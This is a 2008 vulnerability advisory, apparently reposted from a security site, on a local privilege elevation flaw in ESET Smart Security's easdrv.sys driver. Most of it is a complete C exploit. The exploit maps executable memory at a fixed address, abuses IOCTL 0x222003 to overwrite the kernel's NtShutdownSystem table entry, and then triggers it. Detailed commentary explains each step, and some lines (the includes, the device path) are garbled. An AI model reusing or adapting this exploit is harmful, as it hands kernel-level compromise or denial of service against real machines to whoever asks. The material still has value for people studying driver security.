ESET Smart Security 'easdrv.sys' local privilege elevation vulnerability - vulnerability warning - the black bar safety net

2008-08-21T00:00:00
ID MYHACK58:62200820109
Type myhack58
Reporter 佚名
Modified 2008-08-21T00:00:00

Description

:::Determination Xiao network research positions::: Eset Software Smart Security 3.0.667 Description: BUGTRAQ ID: 30719 CNCAN ID: CNCAN-2008081903

ESET Smart Security is an integrated firewall and anti-virus product. The ESET Smart Security 'easdrv.sys' driver has an input-validation issue; a local attacker could exploit the vulnerability to execute arbitrary instructions with kernel-mode privileges. File: easdrv.sys .text:00012B92 loc_12B92: .text:00012B92 push [ebp+InputBuf] .text:00012B95 call ds:off_1A200[eax] .text:00012B9B mov ecx, [ebp+OutputBuffer] .text:00012B9E mov [ecx], eax The input and output pointers are not validated with ProbeForRead/ProbeForWrite; when the input/output pointer points to kernel-mode memory (above 0x80000000) this causes a blue screen. The above code is reached by sending IoControlCode = 0x222003 to the device \\.\\ easdrv.

< reference <http://www.orange-bat.com/adv/2008/adv.08.14.txt> > Test method: [www.sebug.net] The following procedures (methods) may be offensive in nature and are provided for security research and teaching purposes only. Use at your own risk! // // ESET SmartSecurity priv. escalation // // visit www.orange-bat.com for full advisory // // g_ // g_ # orange-bat # com

include <windows. h>

include <stdio. h>

include <ddk/ntifs. h>

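/*
 * Print "<function> failed with error <code>: <system message>" for the
 * calling thread's last Win32 error code.
 *
 * lpszFunction: name of the API that failed (used only in the message).
 * Returns nothing; the text goes to stdout. Does not exit the process --
 * callers decide what to do after the call.
 *
 * NOTE(review): the original mixed sprintf() with TEXT(), so an ANSI (char)
 * build is assumed here -- confirm if the project is ever built with UNICODE.
 */
void TextError(LPTSTR lpszFunction)
{
    LPVOID lpMsgBuf = NULL;
    LPVOID lpDisplayBuf = NULL;
    DWORD dw = GetLastError();

    /* FORMAT_MESSAGE_ALLOCATE_BUFFER makes FormatMessage allocate lpMsgBuf.
     * If the call fails lpMsgBuf stays NULL, so fall back to a code-only
     * message instead of calling lstrlen() on an invalid pointer. */
    if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER |
                      FORMAT_MESSAGE_FROM_SYSTEM |
                      FORMAT_MESSAGE_IGNORE_INSERTS,
                      NULL,
                      dw,
                      MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
                      (LPTSTR)&lpMsgBuf,
                      0,
                      NULL) == 0 || lpMsgBuf == NULL) {
        printf("%s failed with error %lu (no message text available)\n",
               (const char *)lpszFunction, (unsigned long)dw);
        return;
    }

    /* 40 extra TCHARs cover the fixed text plus a 32-bit error code. */
    size_t cch = (size_t)lstrlen((LPCTSTR)lpMsgBuf) +
                 (size_t)lstrlen((LPCTSTR)lpszFunction) + 40;
    lpDisplayBuf = LocalAlloc(LMEM_ZEROINIT, cch * sizeof(TCHAR));
    if (lpDisplayBuf != NULL) {
        /* Bounded write: snprintf() cannot overrun lpDisplayBuf even if the
         * length estimate above is ever wrong. %lu matches the DWORD. */
        snprintf((char *)lpDisplayBuf, cch, "%s failed with error %lu: %s",
                 (const char *)lpszFunction, (unsigned long)dw,
                 (const char *)lpMsgBuf);
        /* "%s" keeps the system-supplied text out of the format string: a
         * message containing '%' must never be interpreted as directives. */
        printf("%s", (const char *)lpDisplayBuf);
        LocalFree(lpDisplayBuf);
    } else {
        /* LocalAlloc failed: still report the error, just unbuffered. */
        printf("%s failed with error %lu: %s", (const char *)lpszFunction,
               (unsigned long)dw, (const char *)lpMsgBuf);
    }

    LocalFree(lpMsgBuf);
}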

/*
 * Open the device DeviceName and send it one DeviceIoControl request.
 *
 * DeviceName:   Win32 device path passed straight to CreateFile.
 * Ioctl:        I/O control code.
 * InputBuffer / InputLen, OutputBuffer / OutputLen:
 *               buffer addresses and sizes; the addresses are carried as
 *               DWORD and cast to PVOID below, which only round-trips on a
 *               32-bit build.
 *
 * Returns FALSE only when the device cannot be opened. Note that it returns
 * TRUE even when DeviceIoControl itself fails (the failure is only printed
 * via TextError), so a caller cannot tell a failed request from a successful
 * one by the return value alone.
 */
BOOL TestIOCTL(PCHAR DeviceName, DWORD Ioctl, DWORD InputBuffer, DWORD InputLen, DWORD OutputBuffer, DWORD OutputLen )
{
    HANDLE hDevice;                // handle to the drive to be examined
    BOOL bResult;                  // results flag
    DWORD junk;                    // discard results
    IO_STATUS_BLOCK IoStatusBlock; // never used below

    hDevice = CreateFile(DeviceName,
                         0,                  // no access to the drive
                         FILE_SHARE_READ |   // share mode
                         FILE_SHARE_WRITE,
                         NULL,               // default security attributes
                         OPEN_EXISTING,      // disposition
                         0,                  // file attributes
                         NULL);              // do not copy file attributes

    if (hDevice == INVALID_HANDLE_VALUE)     // cannot open the drive
    {
        TextError("CreateFile");
        return (FALSE);
    }

    // The buffer pointers are handed to the driver as given; the advisory
    // above notes the driver does not probe them, which is the defect.
    bResult = DeviceIoControl(hDevice,       // device to be queried
                              Ioctl,
                              (PVOID)InputBuffer,
                              InputLen,
                              (PVOID)OutputBuffer,
                              OutputLen,     // output buffer
                              &junk,         // # bytes returned
                              (LPOVERLAPPED)NULL); // synchronous I/O

    if(! bResult){
        TextError("DeviceIoControl");
    }

    CloseHandle(hDevice);

    // bResult is deliberately not propagated here (see header comment).
    return TRUE;
}

/*
 * Commit 0x1337 bytes of read/write/execute memory at the fixed address
 * lpBase with VirtualAlloc.
 *
 * lpBase: requested base address (carried as DWORD; only a valid pointer
 *         width on a 32-bit build).
 * Returns 1 on success, 0 on failure (the error is printed via TextError).
 * PAGE_EXECUTE_READWRITE memory at a fixed, low address is exactly what
 * DEP/ASLR-era defenses are designed to deny; this is 2008-era code.
 */
int AllocMem(DWORD lpBase){

    PVOID lpvResult;

    lpvResult = VirtualAlloc( (LPVOID) lpBase,          // Next page to commit
                              0x1337,                   // Page size, in bytes
                              MEM_COMMIT,               // Allocate a committed page
                              PAGE_EXECUTE_READWRITE);  // Read/write access
    if (lpvResult == NULL ){
        TextError("VirtualAlloc");
        return 0;
    }
    else {
        printf("VirtualAlloc success\n");
    }

    return 1;
}

/*
 * Proof-of-concept driver for the easdrv.sys IOCTL 0x222003 issue described
 * above: maps memory at 0x80000, then issues the IOCTL twice with output
 * pointers inside the kernel address space (SSDT-1 and SSDT+2), and finally
 * calls NtShutdownSystem, whose SSDT slot the two writes were meant to hit.
 *
 * SSDT is a hard-coded kernel address for one specific ntoskrnl build (see the
 * comment on that line), so this only "works" on that exact build; on any
 * other it will at best fail and at worst blue-screen the machine -- which is
 * the denial-of-service side of the same missing ProbeForWrite.
 *
 * argc/argv and the locals Ioctl, ILen, Output, OLen are unused.
 */
int main(int argc, char *argv[])
{
    DWORD Ioctl, Input, ILen, Output, OLen;
    DWORD SSDT;

    if(! AllocMem(0x80000)){
        return 1;
    }

    Input = 12345678;           // arbitrary 4-byte input value
    SSDT = 0x80501414;          // 80501414 8060786e nt!NtShutdownSystem (build-specific)

    Output = 0;
    // &Input is passed to a DWORD parameter: pointer-to-integer truncation,
    // valid only on a 32-bit build.
    if(TestIOCTL("\\\\.\\ easdrv", 0x222003, &Input, 4, SSDT-1, 4)){
        TestIOCTL("\\\\.\\ easdrv", 0x222003, &Input, 4, SSDT+2, 4);

        // TestIOCTL returns TRUE even if DeviceIoControl failed, so reaching
        // this branch does not prove the writes succeeded.
        printf("NtShutdownSystem now points to 0x80000 :)");
        printf("Jump to hyperspace in 2 seconds..");
        Sleep(2*1000);
        NtShutdownSystem(0);
    }
    else{
        printf("Failed to open device");
    }

    return 0;
}